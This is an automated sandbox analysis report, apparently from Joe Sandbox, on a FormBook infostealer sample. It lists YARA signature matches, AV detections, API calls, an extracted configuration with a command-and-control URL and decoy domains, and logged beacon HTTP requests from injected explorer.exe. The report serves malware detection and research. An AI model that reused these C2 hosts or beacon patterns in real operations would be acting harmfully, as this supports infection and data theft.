1.2.kmhbvf.exe.3b00000.1.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
1.2.kmhbvf.exe.3b00000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.kmhbvf.exe.3b00000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
1.2.kmhbvf.exe.3b00000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.kmhbvf.exe.3b00000.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
1.2.kmhbvf.exe.3b00000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.kmhbvf.exe.3b00000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
2.2.kmhbvf.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.kmhbvf.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.kmhbvf.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.kmhbvf.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
2.2.kmhbvf.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.kmhbvf.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.kmhbvf.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.kmhbvf.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 19 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Yara detected FormBook

Source: Yara match	File source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Joe Sandbox ML: detected

Source: 2.0.kmhbvf.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.kmhbvf.exe.3b00000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.kmhbvf.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.justbeand.com/sk19/"], "decoy": ["21diasdegratitud.com", "kx1993.com", "chasergt.com", "837news.com", "naturagent.co.uk", "gatorinsurtech.com", "iyaboolashilesblog.africa", "jamtanganmurah.online", "gguminsa.com", "lilliesdrop.com", "lenvera.com", "link48.co.uk", "azinos777.fun", "lgcdct.cfd", "bg-gobtc.com", "livecarrer.uk", "cbq4u.com", "imalreadygone.com", "wabeng.africa", "jxmheiyouyuetot.tokyo", "atrikvde.xyz", "ceopxb.com", "autovincert.com", "18traversplace.com", "internetmedianews.com", "entersight.net", "guzmanshandymanservicesllc.com", "gqqwdz.com", "emeraldpathjewelery.com", "flowmoneycode.online", "gaziantepmedicalpointanket.com", "111lll.xyz", "irkwood138.site", "abovegross.com", "shopabeee.co.uk", "greenvalleyfoodusa.com", "dd-canada.com", "libertysminings.com", "baronsaccommodation.co.uk", "kareto.buzz", "freeexercisecoalition.com", "73129.vip", "avanteventexperiences.com", "comercialdiabens.fun", "nondescript.uk", "facal.dev", "detox-71934.com", "kovar.club", "jetsparking.com", "infocuspublicidad.com", "xxhcom.com", "indianvoltage.com", "becrownedllc.com", "3744palosverdes.com", "gospelnative.africa", "linkmastermind.com", "cotgfp.com", "lousweigman.com", "cantoaffine.online", "debbiepatrickdesigns.com", "766626.com", "webcubemedia.africa", "autonomaat.com", "hannahmarsh.co.uk"]}

Source: shedfam.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source:	Binary string: netstat.pdbGCTL source: kmhbvf.exe, 00000002.00000003.355015355.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.361850298.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362477372.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362621598.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netstat.pdb source: kmhbvf.exe, 00000002.00000003.355015355.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.361850298.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362477372.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362621598.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: kmhbvf.exe, 00000001.00000003.252395367.0000000004060000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000003.250969240.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.255494479.0000000001376000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.253039833.00000000011DA000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.364247640.000000000162F000.00000040.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362902921.0000000001510000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.363419936.000000000060B000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.357565507.000000000034F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: kmhbvf.exe, 00000001.00000003.252395367.0000000004060000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000003.250969240.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.255494479.0000000001376000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.253039833.00000000011DA000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.364247640.000000000162F000.00000040.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362902921.0000000001510000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.363419936.000000000060B000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.357565507.000000000034F000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\shedfam.exe	Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405620
Source: C:\Users\user\Desktop\shedfam.exe	Code function: 0_2_00405FF6 FindFirstFileA,FindClose,	0_2_00405FF6
Source: C:\Users\user\Desktop\shedfam.exe	Code function: 0_2_00402654 FindFirstFileA,	0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_00F34005
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_00F3C2FF
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3494A GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00F3494A
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	1_2_00F3CD9F
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3CD14 FindFirstFileW,FindClose,	1_2_00F3CD14
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_00F3F5D8
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_00F3F735
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_00F3FA36
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F33CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_00F33CE2

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 4x nop then pop esi		2_2_004172FF
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 4x nop then pop esi		2_2_004172B6

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 18.167.242.213 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.100.63.146 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.111lll.xyz
Source: C:\Windows\explorer.exe	Domain query: www.73129.vip

Uses netstat to query active network connections and open ports

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE

Performs DNS queries to domains with low reputation

Source: C:\Windows\explorer.exe

DNS query: www.111lll.xyz

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.justbeand.com/sk19/

Source: global traffic	HTTP traffic detected: GET /sk19/?6lu=u4lk2PnXcU0u2VBKyLJoTfxxVYVxHm+9jz8FSZNawyXEtvRDPmLLRjoruE33sVgH1sLP&u4=pVhTtd7pjTy HTTP/1.1Host: www.111lll.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sk19/?6lu=QEAmWZfTRhzoING4/pUtXBuIHlMFTiZNz3G0bLc7Fgt63bTZUMXUq+W3t0nrgTJvEVvm&u4=pVhTtd7pjTy HTTP/1.1Host: www.73129.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: YISUCLOUDLTD-AS-APYISUCLOUDLTDHK YISUCLOUDLTD-AS-APYISUCLOUDLTDHK

Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: NETSTAT.EXE, 0000000D.00000002.518369394.0000000003D9F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://gcsahrz23.xyz/
Source: shedfam.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: shedfam.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmp, kmhbvf.exe, 00000002.00000000.252060134.0000000000F99000.00000002.00000001.01000000.00000004.sdmp, explorer.exe, 00000003.00000000.294072289.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.305847313.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.257903286.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.333339547.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.280708898.000000000F276000.00000004.00000001.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: kmhbvf.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Source: unknown

DNS traffic detected: queries for: www.111lll.xyz

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F429BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

1_2_00F429BA

Source: global traffic	HTTP traffic detected: GET /sk19/?6lu=u4lk2PnXcU0u2VBKyLJoTfxxVYVxHm+9jz8FSZNawyXEtvRDPmLLRjoruE33sVgH1sLP&u4=pVhTtd7pjTy HTTP/1.1Host: www.111lll.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sk19/?6lu=QEAmWZfTRhzoING4/pUtXBuIHlMFTiZNz3G0bLc7Fgt63bTZUMXUq+W3t0nrgTJvEVvm&u4=pVhTtd7pjTy HTTP/1.1Host: www.73129.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 14:13:30 GMTContent-Type: text/htmlContent-Length: 146Connection: closeServer: Cheertech CDNX-Cache-Status: MISSData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F30508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

1_2_00F30508

Source: C:\Users\user\Desktop\shedfam.exe

Code function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

